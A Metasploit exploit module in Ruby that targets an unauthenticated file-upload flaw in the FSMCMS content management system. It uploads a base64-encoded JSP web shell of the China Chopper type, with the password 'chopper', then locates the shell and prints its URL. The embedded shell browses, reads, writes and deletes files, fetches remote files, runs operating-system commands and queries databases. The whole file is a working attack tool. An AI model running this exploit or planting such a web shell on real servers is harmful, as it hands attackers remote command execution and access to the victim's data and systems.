require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
                      'Name' => '	FSMCMS系统任意文件写入',
                      'Description' => %q{
                            无需登录等认证即可上传文件,默认上传菜刀马，密码chopper
      },
                      'Author' =>
                          [
                              '路人甲',
                              '扶摇直上打飞机'
                          ],
                      'License' => MSF_LICENSE,
                      'References' =>
                          [
                              ['url', 'http://www.wooyun.org/bugs/wooyun-2015-0144274']
                          ],
                      'Privileged' => true,
                      'Platform' => ['linux'],
                      'Targets' => [['all of them', {}],],
                      'Arch' => ARCH_JAVA,
                      'DefaultTarget' => 0,
          ))
    register_options(
        [
            Opt::RHOST(),
            Opt::RPORT(80),
            OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/']),
        ], self.class)
  end

  def rand_file_info
    file_path = rand_text_alphanumeric(6)
    file_name = rand_text_alphanumeric(6)
    return file_path, file_name
  end

  def payload_data
    return '<?xml version="1.0" encoding="UTF-8"?><root>PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKixqYXZhLnV0aWwuKixqYXZhLm5ldC4qLGphdmEuc3FsLiosamF2YS50ZXh0LioiJT4NCjwlIQ0KU3RyaW5nIFB3ZD0iY2hvcHBlciI7DQpTdHJpbmcgRUMoU3RyaW5nIHMsU3RyaW5nIGMpdGhyb3dzIEV4Y2VwdGlvbntyZXR1cm4gczt9Ly9uZXcgU3RyaW5nKHMuZ2V0Qnl0ZXMoIklTTy04ODU5LTEiKSxjKTt9DQpDb25uZWN0aW9uIEdDKFN0cmluZyBzKXRocm93cyBFeGNlcHRpb257U3RyaW5nW10geD1zLnRyaW0oKS5zcGxpdCgiXHJcbiIpO0NsYXNzLmZvck5hbWUoeFswXS50cmltKCkpLm5ld0luc3RhbmNlKCk7DQpDb25uZWN0aW9uIGM9RHJpdmVyTWFuYWdlci5nZXRDb25uZWN0aW9uKHhbMV0udHJpbSgpKTtpZih4Lmxlbmd0aD4yKXtjLnNldENhdGFsb2coeFsyXS50cmltKCkpO31yZXR1cm4gYzt9DQp2b2lkIEFBKFN0cmluZ0J1ZmZlciBzYil0aHJvd3MgRXhjZXB0aW9ue0ZpbGUgcltdPUZpbGUubGlzdFJvb3RzKCk7Zm9yKGludCBpPTA7aTxyLmxlbmd0aDtpKyspe3NiLmFwcGVuZChyW2ldLnRvU3RyaW5nKCkuc3Vic3RyaW5nKDAsMikpO319DQp2b2lkIEJCKFN0cmluZyBzLFN0cmluZ0J1ZmZlciBzYil0aHJvd3MgRXhjZXB0aW9ue0ZpbGUgb0Y9bmV3IEZpbGUocyksbFtdPW9GLmxpc3RGaWxlcygpO1N0cmluZyBzVCwgc1Esc0Y9IiI7amF2YS51dGlsLkRhdGUgZHQ7DQpTaW1wbGVEYXRlRm9ybWF0IGZtPW5ldyBTaW1wbGVEYXRlRm9ybWF0KCJ5eXl5LU1NLWRkIEhIOm1tOnNzIik7Zm9yKGludCBpPTA7aTxsLmxlbmd0aDtpKyspe2R0PW5ldyBqYXZhLnV0aWwuRGF0ZShsW2ldLmxhc3RNb2RpZmllZCgpKTsNCnNUPWZtLmZvcm1hdChkdCk7c1E9bFtpXS5jYW5SZWFkKCk/IlIiOiIiO3NRKz1sW2ldLmNhbldyaXRlKCk/IiBXIjoiIjtpZihsW2ldLmlzRGlyZWN0b3J5KCkpe3NiLmFwcGVuZChsW2ldLmdldE5hbWUoKSsiL1x0IitzVCsiXHQiK2xbaV0ubGVuZ3RoKCkrIlx0IitzUSsiXG4iKTt9DQplbHNle3NGKz1sW2ldLmdldE5hbWUoKSsiXHQiK3NUKyJcdCIrbFtpXS5sZW5ndGgoKSsiXHQiK3NRKyJcbiI7fX1zYi5hcHBlbmQoc0YpO30NCnZvaWQgRUUoU3RyaW5nIHMpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIGY9bmV3IEZpbGUocyk7aWYoZi5pc0RpcmVjdG9yeSgpKXtGaWxlIHhbXT1mLmxpc3RGaWxlcygpOw0KZm9yKGludCBrPTA7azx4Lmxlbmd0aDtrKyspe2lmKCF4W2tdLmRlbGV0ZSgpKXtFRSh4W2tdLmdldFBhdGgoKSk7fX19Zi5kZWxldGUoKTt9DQp2b2lkIEZGKFN0cmluZyBzLEh0dHBTZXJ2bGV0UmVzcG9uc2Ugcil0aHJvd3MgRXhjZXB0aW9ue2ludCBuO2J5dGVbXSBiPW5ldyBieXRlWzUxMl07ci5yZXNldCgpOw0KU2VydmxldE91dHB1dFN0cmVhbSBvcz1yLmdldE91dHB1dFN0cmVhbSgpO0J1ZmZlcmVkSW5wdXRTdHJlYW0gaXM9bmV3IEJ1ZmZlcmVkSW5wdXRTdHJlYW0obmV3IEZpbGVJbnB1dFN0cmVhbShzKSk7DQpvcy53cml0ZSgoIi0+IisifCIpLmdldEJ5dGVzKCksMCwzKTt3aGlsZSgobj1pcy5yZWFkKGIsMCw1MTIpKSE9LTEpe29zLndyaXRlKGIsMCxuKTt9b3Mud3JpdGUoKCJ8IisiPC0iKS5nZXRCeXRlcygpLDAsMyk7b3MuY2xvc2UoKTtpcy5jbG9zZSgpO30NCnZvaWQgR0coU3RyaW5nIHMsIFN0cmluZyBkKXRocm93cyBFeGNlcHRpb257U3RyaW5nIGg9IjAxMjM0NTY3ODlBQkNERUYiO2ludCBuO0ZpbGUgZj1uZXcgRmlsZShzKTtmLmNyZWF0ZU5ld0ZpbGUoKTsNCkZpbGVPdXRwdXRTdHJlYW0gb3M9bmV3IEZpbGVPdXRwdXRTdHJlYW0oZik7Zm9yKGludCBpPTA7aTxkLmxlbmd0aCgpO2krPTIpDQp7b3Mud3JpdGUoKGguaW5kZXhPZihkLmNoYXJBdChpKSk8PDR8aC5pbmRleE9mKGQuY2hhckF0KGkrMSkpKSk7fW9zLmNsb3NlKCk7fQ0Kdm9pZCBISChTdHJpbmcgcyxTdHJpbmcgZCl0aHJvd3MgRXhjZXB0aW9ue0ZpbGUgc2Y9bmV3IEZpbGUocyksZGY9bmV3IEZpbGUoZCk7aWYoc2YuaXNEaXJlY3RvcnkoKSl7aWYoIWRmLmV4aXN0cygpKXtkZi5ta2RpcigpO31GaWxlIHpbXT1zZi5saXN0RmlsZXMoKTsNCmZvcihpbnQgaj0wO2o8ei5sZW5ndGg7aisrKXtISChzKyIvIit6W2pdLmdldE5hbWUoKSxkKyIvIit6W2pdLmdldE5hbWUoKSk7fQ0KfWVsc2V7RmlsZUlucHV0U3RyZWFtIGlzPW5ldyBGaWxlSW5wdXRTdHJlYW0oc2YpO0ZpbGVPdXRwdXRTdHJlYW0gb3M9bmV3IEZpbGVPdXRwdXRTdHJlYW0oZGYpOw0KaW50IG47Ynl0ZVtdIGI9bmV3IGJ5dGVbNTEyXTt3aGlsZSgobj1pcy5yZWFkKGIsMCw1MTIpKSE9LTEpe29zLndyaXRlKGIsMCxuKTt9aXMuY2xvc2UoKTtvcy5jbG9zZSgpO319DQp2b2lkIElJKFN0cmluZyBzLFN0cmluZyBkKXRocm93cyBFeGNlcHRpb257RmlsZSBzZj1uZXcgRmlsZShzKSxkZj1uZXcgRmlsZShkKTtzZi5yZW5hbWVUbyhkZik7fXZvaWQgSkooU3RyaW5nIHMpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIGY9bmV3IEZpbGUocyk7Zi5ta2RpcigpO30NCnZvaWQgS0soU3RyaW5nIHMsU3RyaW5nIHQpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIGY9bmV3IEZpbGUocyk7U2ltcGxlRGF0ZUZvcm1hdCBmbT1uZXcgU2ltcGxlRGF0ZUZvcm1hdCgieXl5eS1NTS1kZCBISDptbTpzcyIpOw0KamF2YS51dGlsLkRhdGUgZHQ9Zm0ucGFyc2UodCk7Zi5zZXRMYXN0TW9kaWZpZWQoZHQuZ2V0VGltZSgpKTt9DQp2b2lkIExMKFN0cmluZyBzLCBTdHJpbmcgZCl0aHJvd3MgRXhjZXB0aW9ue1VSTCB1PW5ldyBVUkwocyk7aW50IG47RmlsZU91dHB1dFN0cmVhbSBvcz1uZXcgRmlsZU91dHB1dFN0cmVhbShkKTsNCkh0dHBVUkxDb25uZWN0aW9uIGg9KEh0dHBVUkxDb25uZWN0aW9uKXUub3BlbkNvbm5lY3Rpb24oKTtJbnB1dFN0cmVhbSBpcz1oLmdldElucHV0U3RyZWFtKCk7Ynl0ZVtdIGI9bmV3IGJ5dGVbNTEyXTsNCndoaWxlKChuPWlzLnJlYWQoYiwwLDUxMikpIT0tMSl7b3Mud3JpdGUoYiwwLG4pO31vcy5jbG9zZSgpO2lzLmNsb3NlKCk7aC5kaXNjb25uZWN0KCk7fQ0Kdm9pZCBNTShJbnB1dFN0cmVhbSBpcywgU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257U3RyaW5nIGw7QnVmZmVyZWRSZWFkZXIgYnI9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihpcykpOw0Kd2hpbGUoKGw9YnIucmVhZExpbmUoKSkhPW51bGwpe3NiLmFwcGVuZChsKyJcclxuIik7fX0NCnZvaWQgTk4oU3RyaW5nIHMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257Q29ubmVjdGlvbiBjPUdDKHMpO1Jlc3VsdFNldCByPWMuZ2V0TWV0YURhdGEoKS5nZXRDYXRhbG9ncygpOw0Kd2hpbGUoci5uZXh0KCkpe3NiLmFwcGVuZChyLmdldFN0cmluZygxKSsiXHQiKTt9ci5jbG9zZSgpO2MuY2xvc2UoKTt9DQp2b2lkIE9PKFN0cmluZyBzLFN0cmluZ0J1ZmZlciBzYil0aHJvd3MgRXhjZXB0aW9ue0Nvbm5lY3Rpb24gYz1HQyhzKTtTdHJpbmdbXSB0PXsiVEFCTEUifTtSZXN1bHRTZXQgcj1jLmdldE1ldGFEYXRhKCkuZ2V0VGFibGVzIChudWxsLG51bGwsIiUiLHQpOw0Kd2hpbGUoci5uZXh0KCkpe3NiLmFwcGVuZChyLmdldFN0cmluZygiVEFCTEVfTkFNRSIpKyJcdCIpO31yLmNsb3NlKCk7Yy5jbG9zZSgpO30NCnZvaWQgUFAoU3RyaW5nIHMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257U3RyaW5nW10geD1zLnRyaW0oKS5zcGxpdCgiXHJcbiIpO0Nvbm5lY3Rpb24gYz1HQyhzKTsNClN0YXRlbWVudCBtPWMuY3JlYXRlU3RhdGVtZW50KDEwMDUsMTAwNyk7UmVzdWx0U2V0IHI9bS5leGVjdXRlUXVlcnkoInNlbGVjdCAqIGZyb20gIit4WzNdKTtSZXN1bHRTZXRNZXRhRGF0YSBkPXIuZ2V0TWV0YURhdGEoKTsNCmZvcihpbnQgaT0xO2k8PWQuZ2V0Q29sdW1uQ291bnQoKTtpKyspe3NiLmFwcGVuZChkLmdldENvbHVtbk5hbWUoaSkrIiAoIitkLmdldENvbHVtblR5cGVOYW1lKGkpKyIpXHQiKTt9ci5jbG9zZSgpO20uY2xvc2UoKTtjLmNsb3NlKCk7fQ0Kdm9pZCBRUShTdHJpbmcgY3MsU3RyaW5nIHMsU3RyaW5nIHEsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257aW50IGk7Q29ubmVjdGlvbiBjPUdDKHMpO1N0YXRlbWVudCBtPWMuY3JlYXRlU3RhdGVtZW50KDEwMDUsMTAwOCk7DQp0cnl7UmVzdWx0U2V0IHI9bS5leGVjdXRlUXVlcnkocSk7UmVzdWx0U2V0TWV0YURhdGEgZD1yLmdldE1ldGFEYXRhKCk7aW50IG49ZC5nZXRDb2x1bW5Db3VudCgpO2ZvcihpPTE7aTw9bjtpKyspe3NiLmFwcGVuZChkLmdldENvbHVtbk5hbWUoaSkrIlx0fFx0Iik7DQp9c2IuYXBwZW5kKCJcclxuIik7d2hpbGUoci5uZXh0KCkpe2ZvcihpPTE7aTw9bjtpKyspe3NiLmFwcGVuZChFQyhyLmdldFN0cmluZyhpKSxjcykrIlx0fFx0Iik7fXNiLmFwcGVuZCgiXHJcbiIpO31yLmNsb3NlKCk7fQ0KY2F0Y2goRXhjZXB0aW9uIGUpe3NiLmFwcGVuZCgiUmVzdWx0XHR8XHRcclxuIik7dHJ5e20uZXhlY3V0ZVVwZGF0ZShxKTtzYi5hcHBlbmQoIkV4ZWN1dGUgU3VjY2Vzc2Z1bGx5IVx0fFx0XHJcbiIpOw0KfWNhdGNoKEV4Y2VwdGlvbiBlZSl7c2IuYXBwZW5kKGVlLnRvU3RyaW5nKCkrIlx0fFx0XHJcbiIpO319bS5jbG9zZSgpO2MuY2xvc2UoKTt9DQolPjwlDQpTdHJpbmcgY3M9cmVxdWVzdC5nZXRQYXJhbWV0ZXIoInowIikrIiI7cmVxdWVzdC5zZXRDaGFyYWN0ZXJFbmNvZGluZyhjcyk7cmVzcG9uc2Uuc2V0Q29udGVudFR5cGUoInRleHQvaHRtbDtjaGFyc2V0PSIrY3MpOw0KU3RyaW5nIFo9RUMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoUHdkKSsiIixjcyk7U3RyaW5nIHoxPUVDKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ6MSIpKyIiLGNzKTtTdHJpbmcgejI9RUMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoInoyIikrIiIsY3MpOw0KU3RyaW5nQnVmZmVyIHNiPW5ldyBTdHJpbmdCdWZmZXIoIiIpO3RyeXtzYi5hcHBlbmQoIi0+IisifCIpOw0KaWYoWi5lcXVhbHMoIkEiKSl7U3RyaW5nIHM9bmV3IEZpbGUoYXBwbGljYXRpb24uZ2V0UmVhbFBhdGgocmVxdWVzdC5nZXRSZXF1ZXN0VVJJKCkpKS5nZXRQYXJlbnQoKTtzYi5hcHBlbmQocysiXHQiKTtpZighcy5zdWJzdHJpbmcoMCwxKS5lcXVhbHMoIi8iKSl7QUEoc2IpO319DQplbHNlIGlmKFouZXF1YWxzKCJCIikpe0JCKHoxLHNiKTt9ZWxzZSBpZihaLmVxdWFscygiQyIpKXtTdHJpbmcgbD0iIjtCdWZmZXJlZFJlYWRlciBicj1uZXcgQnVmZmVyZWRSZWFkZXIobmV3IElucHV0U3RyZWFtUmVhZGVyKG5ldyBGaWxlSW5wdXRTdHJlYW0obmV3IEZpbGUoejEpKSkpOw0Kd2hpbGUoKGw9YnIucmVhZExpbmUoKSkhPW51bGwpe3NiLmFwcGVuZChsKyJcclxuIik7fWJyLmNsb3NlKCk7fQ0KZWxzZSBpZihaLmVxdWFscygiRCIpKXtCdWZmZXJlZFdyaXRlciBidz1uZXcgQnVmZmVyZWRXcml0ZXIobmV3IE91dHB1dFN0cmVhbVdyaXRlcihuZXcgRmlsZU91dHB1dFN0cmVhbShuZXcgRmlsZSh6MSkpKSk7DQpidy53cml0ZSh6Mik7YncuY2xvc2UoKTtzYi5hcHBlbmQoIjEiKTt9ZWxzZSBpZihaLmVxdWFscygiRSIpKXtFRSh6MSk7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIkYiKSl7RkYoejEscmVzcG9uc2UpO30NCmVsc2UgaWYoWi5lcXVhbHMoIkciKSl7R0coejEsejIpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJIIikpe0hIKHoxLHoyKTtzYi5hcHBlbmQoIjEiKTt9ZWxzZSBpZihaLmVxdWFscygiSSIpKXtJSSh6MSx6Mik7c2IuYXBwZW5kKCIxIik7fQ0KZWxzZSBpZihaLmVxdWFscygiSiIpKXtKSih6MSk7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIksiKSl7S0soejEsejIpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJMIikpe0xMKHoxLHoyKTtzYi5hcHBlbmQoIjEiKTt9DQplbHNlIGlmKFouZXF1YWxzKCJNIikpe1N0cmluZ1tdIGM9e3oxLnN1YnN0cmluZygyKSx6MS5zdWJzdHJpbmcoMCwyKSx6Mn07UHJvY2VzcyBwPVJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoYyk7DQpNTShwLmdldElucHV0U3RyZWFtKCksc2IpO01NKHAuZ2V0RXJyb3JTdHJlYW0oKSxzYik7fWVsc2UgaWYoWi5lcXVhbHMoIk4iKSl7Tk4oejEsc2IpO31lbHNlIGlmKFouZXF1YWxzKCJPIikpe09PKHoxLHNiKTt9DQplbHNlIGlmKFouZXF1YWxzKCJQIikpe1BQKHoxLHNiKTt9ZWxzZSBpZihaLmVxdWFscygiUSIpKXtRUShjcyx6MSx6MixzYik7fQ0KfWNhdGNoKEV4Y2VwdGlvbiBlKXtzYi5hcHBlbmQoIkVSUk9SIisiOi8vICIrZS50b1N0cmluZygpKTt9c2IuYXBwZW5kKCJ8IisiPC0iKTtvdXQucHJpbnQoc2IudG9TdHJpbmcoKSk7DQolPg==</root>'
  end

  def post_data
    file_path, file_name = rand_file_info
    print_status("start to exploit ....")

    res = send_request_cgi(
        {
            'method' => 'POST',
            'uri' => "#{targeturi}/cms/client/uploadpic_html.jsp?toname=#{file_name}.jsp&diskno=#{file_path}",
            'data' => payload_data,
            'headers' =>
                {
                    "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0",
                    "Content-Type" => "multipart/form-data;"
                }
        }, timeout = 4)
    check_post = send_request_raw({'uri' => "#{targeturi}/cms-data/temp_dir/#{file_path}/temp.files/#{file_name}.jsp"},timeout = 4)
    if check_post.code != '404'
      file_url = "#{rhost}#{targeturi}/cms-data/temp_dir/#{file_path}/temp.files/#{file_name}.jsp"
      return file_url
    else
      return Exploit::CheckCode::Safe
    end

  end

  def exploit
    post_res = post_data
    if post_res == Exploit::CheckCode::Safe
      fail_with(Failure::Unknown,"cannot exploit target ~_~")
    else
      print_good("finshed exploit ^_^")
      print_good(post_res)
      print_good("菜刀链接密码为chopper")
    end
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def targeturi
    datastore['TARGETURI']
  end

end